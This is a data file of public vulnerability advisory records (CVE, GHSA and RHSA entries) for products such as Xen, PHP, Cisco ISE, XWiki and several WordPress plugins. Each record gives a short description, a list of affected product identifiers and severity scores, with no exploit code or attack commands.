GHSA-xr88-75g2-cjj4 | rpc-gssd in nfs-utils before 1.2.8 performs reverse DNS resolution for server names during GSSAPI authentication, which might allow remote attackers to read otherwise-restricted files via DNS spoofing attacks. | [] | null | null | null | null | null | |
CVE-2010-2070 | arch/ia64/xen/faults.c in Xen 3.4 and 4.0 in Linux kernel 2.6.18, and possibly other kernel versions, when running on IA-64 architectures, allows local users to cause a denial of service and "turn on BE by modifying the user mask of the PSR," as demonstrated via exploitation of CVE-2006-0742. | [
"cpe:2.3:a:xensource:xen:3.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:xensource:xen:4.0.0:*:*:*:*:*:*:*"
] | null | null | null | 4.9 | null | |
CVE-2025-50155 | Windows Push Notifications Apps Elevation of Privilege Vulnerability | Access of resource using incompatible type ('type confusion') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | [] | null | 7.8 | null | null | null |
GHSA-pm77-vj97-hfv8 | HTML injection vulnerabilities in OpenCart versions prior to 4.1.0. These vulnerabilities could allow an attacker to modify the HTML of the victim's browser by sending a malicious URL and modifying the parameter name in /account/register. | [] | null | 4.7 | null | null | null | |
CVE-2023-32249 | ksmbd: not allow guest user on multichannel | In the Linux kernel, the following vulnerability has been resolved:
ksmbd: not allow guest user on multichannel
This patch return STATUS_NOT_SUPPORTED if binding session is guest. | [] | null | 5.5 | null | null | null |
CVE-2022-20959 | Cisco Identity Services Engine Cross-Site Scripting Vulnerability | A vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by persuading an authenticated administrator of the web-based management interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | [
"cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:-:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch1:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch2:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch3:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch4:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch5:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch6:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:2.7.0:patch7:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:-:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch1:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch2:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch3:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch4:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch5:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.0.0:patch6:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.1:-:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.1:patch1:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.1:patch3:*:*:*:*:*:*",
"cpe:2.3:a:cisco:identity_services_engine:3.2:-:*:*:*:*:*:*"
] | null | 6.1 | null | null | null |
CVE-2025-55317 | Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | Improper link resolution before file access ('link following') in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally. | [] | null | 7.8 | null | null | null |
CVE-2000-1025 | eWave ServletExec JSP/Java servlet engine, versions 3.0C and earlier, allows remote attackers to cause a denial of service via a URL that contains the "/servlet/" string, which invokes the ServletExec servlet and causes an exception if the servlet is already running. | [
"cpe:2.3:a:unify:ewave_servletexec:3.0c:*:*:*:*:*:*:*"
] | null | null | null | 5 | null | |
GHSA-w2jx-6xv7-8634 | This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app may be able to disclose kernel memory | [] | null | 5.5 | null | null | null | |
GHSA-rmxw-c48h-2vf5 | XWiki Platform privilege escalation from script right to programming right through title displayer | ImpactIn XWiki Platform, it's possible for a user to write a script in which any velocity content is executed with the right of any other document content author.To reproduce:As a user with script but not programming right, create a document with the following content:Since this API require programming right and the user does not have it, the expected result is `$doc.document.authors.contentAuthor` (not executed script), unfortunately with the security vulnerability we get `XWiki.superadmin` which shows that the title was executed with the right of the unmodified document.PatchesThis has been patched in XWiki 14.10.7 and 15.2-RC-1.WorkaroundsThere are no known workarounds for it.Referenceshttps://jira.xwiki.org/browse/XWIKI-20624https://github.com/xwiki/xwiki-platform/commit/11a9170dfe63e59f4066db67f84dbfce4ed619c6https://jira.xwiki.org/browse/XWIKI-20625https://github.com/xwiki/xwiki-platform/commit/41d7dca2d30084966ca6a7ee537f39ee8354a7e3For more informationIf you have any questions or comments about this advisory:Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)Email us at [Security Mailing List](mailto:security@xwiki.org) | [] | null | 9.1 | null | null | null |
CVE-2015-4602 | The __PHP_Incomplete_Class function in ext/standard/incomplete_class.c in PHP before 5.4.40, 5.5.x before 5.5.24, and 5.6.x before 5.6.8 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to a "type confusion" issue. | [
"cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*",
"cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_eus:7.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*"
] | null | null | 9.8 | 10 | null | |
CVE-2025-24575 | WordPress HelloAsso plugin <= 1.1.11 - Cross Site Scripting (XSS) vulnerability | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HelloAsso HelloAsso allows Stored XSS. This issue affects HelloAsso: from n/a through 1.1.11. | [] | null | 6.5 | null | null | null |
GHSA-cjcf-wm2p-59h5 | Exposure of Sensitive Information to an Unauthorized Actor in Oracle MySQL Connectors Java | Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.41 and earlier. Easily "exploitable" vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data. CVSS 3.0 Base Score 3.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N). | [] | null | null | 3.3 | null | null |
CVE-2025-4504 | SourceCodester Online College Library System index.php sql injection | A vulnerability was found in SourceCodester Online College Library System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php. The manipulation of the argument Category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | [] | 6.9 | 7.3 | 7.3 | 7.5 | null |
GHSA-3wph-gw9m-m3mm | SAP GUI for Windows may allow the leak of NTML hashes when specific ABAP frontend services are called with UNC paths. For a successful attack, the attacker needs developer authorization in a specific Application Server ABAP to make changes in the code, and the victim needs to execute by using SAP GUI for Windows. This could trigger automatic NTLM authentication, potentially exposing hashed credentials to an attacker. As a result, it has a high impact on the confidentiality. | [] | null | 4.5 | null | null | null | |
CVE-2022-32073 | WolfSSH v1.4.7 was discovered to contain an integer overflow via the function wolfSSH_SFTP_RecvRMDIR. | [
"cpe:2.3:a:wolfssh:wolfssh:1.4.7:*:*:*:*:*:*:*"
] | null | 9.8 | null | 7.5 | null | |
GHSA-h5xc-2277-3x2r | A weakness has been identified in Campcodes Advanced Online Voting Management System 1.0. This vulnerability affects unknown code of the file /admin/voters_add.php. Executing manipulation of the argument photo can lead to unrestricted upload. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | [] | 2.1 | 6.3 | null | null | null | |
GHSA-4pxq-6xxj-8w94 | A potential security vulnerability has been identified in the installer of HPE Version Control Repository Manager. The vulnerability could allow local escalation of privilege. HPE has made the following software update to resolve the vulnerability in HPE Version Control Repository Manager installer 7.6.14.0. | [] | null | 7.8 | null | null | null | |
CVE-2024-1522 | Cross-Site Request Forgery (CSRF) Leading to Remote Code Execution in parisneo/lollms-webui | A Cross-Site Request Forgery (CSRF) vulnerability in the parisneo/lollms-webui project allows remote attackers to execute arbitrary code on a victim's system. The vulnerability stems from the `/execute_code` API endpoint, which does not properly validate requests, enabling an attacker to craft a malicious webpage that, when visited by a victim, submits a form to the victim's local lollms-webui instance to execute arbitrary OS commands. This issue allows attackers to take full control of the victim's system without requiring direct network access to the vulnerable application. | [
"cpe:2.3:a:parisneo:lollms-webui:*:*:*:*:*:*:*:*"
] | null | null | 8.8 | null | null |
GHSA-7pw6-2xv6-25xh | A maliciously crafted RGB file, when parsed through Autodesk 3ds Max, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | [] | null | 7.8 | null | null | null | |
GHSA-f46h-72fj-m37w | The printer friendly version functionality in the Book module in Drupal 6.x before 6.28 and 7.x before 7.19 does not properly restrict access to node that are part of a book outline, which allows remote authenticated users with the "access printer-friendly version" permission to read node titles and possibly node content via unspecified vectors. | [] | null | null | null | null | null | |
GHSA-px83-9343-xrfj | An access issue was addressed with improved access restrictions. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6, tvOS 15. A user may gain access to protected parts of the file system. | [] | null | 5.5 | null | null | null | |
GHSA-5jg4-p78r-p5j3 | Improper Neutralization of Input During Web Page Generation Apache ActiveMQ | In Apache ActiveMQ 5.x before 5.14.2, an instance of a cross-site scripting vulnerability was identified to be present in the web based administration console. The root cause of this issue is improper user data output validation. | [] | null | null | 6.1 | null | null |
CVE-2025-52773 | WordPress HieCOR Payment Gateway plugin plugin <= 1.5.11 - SQL Injection vulnerability | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in hiecor HieCOR Payment Gateway Plugin hcv4-payment-gateway allows SQL Injection.This issue affects HieCOR Payment Gateway Plugin: from n/a through <= 1.5.11. | [] | null | 9.8 | null | null | null |
GHSA-p559-4mqq-cvfv | includes/db/class.reflines_db.inc in FrontAccounting 2.4.6 contains a SQL Injection vulnerability in the reference field that can allow the attacker to grab the entire database of the application via the void_transaction.php filterType parameter. | [] | null | null | 9.8 | null | null | |
GHSA-65v4-72rq-m9q5 | An issue was discovered on Eaton UPS 9PX 8000 SP devices. The appliance discloses the SNMP version 3 user's password. The web page displayed by the appliance contains the password in cleartext. Passwords of the read and write users could be retrieved by browsing the source code of the webpage. | [] | null | null | 4.9 | null | null | |
GHSA-8gx7-qfm6-j56p | Microsoft Word 2003 SP3 and 2007 SP2 and SP3, Office 2008 and 2011 for Mac, and Office Compatibility Pack SP2 and SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "RTF Mismatch Vulnerability." | [] | null | null | null | null | null | |
GHSA-f8vv-4g72-7v42 | Improper access control for some Device Plugins for Kubernetes software maintained by Intel before version 0.32.0 may allow a privileged user to potentially enable denial of service via local access. | [] | 6.7 | 4.4 | null | null | null | |
CVE-2005-0053 | Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via drag and drop events, aka the "Drag-and-Drop Vulnerability." | [
"cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2000:*:sp4:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:enterprise:*:64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:enterprise_64-bit:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:r2:*:64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:r2:*:datacenter_64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:standard:*:64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_2003_server:web:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:*:media_center:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp1:media_center:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:home:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:media_center:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*"
] | null | null | null | 7.5 | null | |
RHSA-2024:10219 | Red Hat Security Advisory: perl-App-cpanminus:1.7044 security update | perl-App-cpanminus: Insecure HTTP in App::cpanminus Allows Code Execution Vulnerability | [
"cpe:/a:redhat:enterprise_linux:8::appstream"
] | null | 8.1 | null | null | null |
GHSA-5c2g-j2jh-5g96 | A vulnerability was determined in Scada-LTS 2.7.8.1. Affected by this vulnerability is an unknown functionality of the file /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr. Executing manipulation can lead to information disclosure. The attack may be performed from a remote location. The exploit has been publicly disclosed and may be utilized. The vendor explains: "[T]he risks of indicated vulnerabilities seem to be minimal as all scenarios likely require admin permissions. Moreover, regardless our team fixes those vulnerabilities - the overall risk change to the user due to malicious admin actions will not be lower." | [] | 2.1 | 4.3 | null | null | null | |
CVE-2026-23097 | migrate: correct lock ordering for hugetlb file folios | In the Linux kernel, the following vulnerability has been resolved:
migrate: correct lock ordering for hugetlb file folios
Syzbot has found a deadlock (analyzed by Lance Yang):
1) Task (5749): Holds folio_lock, then tries to acquire i_mmap_rwsem(read lock).
2) Task (5754): Holds i_mmap_rwsem(write lock), then tries to acquire
folio_lock.
migrate_pages()
-> migrate_hugetlbs()
-> unmap_and_move_huge_page() <- Takes folio_lock!
-> remove_migration_ptes()
-> __rmap_walk_file()
-> i_mmap_lock_read() <- Waits for i_mmap_rwsem(read lock)!
hugetlbfs_fallocate()
-> hugetlbfs_punch_hole() <- Takes i_mmap_rwsem(write lock)!
-> hugetlbfs_zero_partial_page()
-> filemap_lock_hugetlb_folio()
-> filemap_lock_folio()
-> __filemap_get_folio <- Waits for folio_lock!
The migration path is the one taking locks in the wrong order according to
the documentation at the top of mm/rmap.c. So expand the scope of the
existing i_mmap_lock to cover the calls to remove_migration_ptes() too.
This is (mostly) how it used to be after commit c0d0381ade79. That was
removed by 336bf30eb765 for both file & anon hugetlb pages when it should
only have been removed for anon hugetlb pages. | [] | null | null | null | null | null |
GHSA-p4xq-57qv-f9c5 | Luxion KeyShot 3DS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of 3DS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23681. | [] | null | null | 7.8 | null | null | |
CVE-2024-41476 | AMTT Hotel Broadband Operation System (HiBOS) V3.0.3.151204 and before is vulnerable to SQL Injection via /manager/card/card_detail.php. | [
"cpe:2.3:a:amttgroup:hotel_broadband_operation_system:*:*:*:*:*:*:*:*"
] | null | 9.8 | null | null | null | |
CVE-2023-50110 | TestLink through 1.9.20 allows type juggling for authentication bypass because === is not used. | [
"cpe:2.3:a:testlink:testlink:*:*:*:*:*:*:*:*"
] | null | 7.5 | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.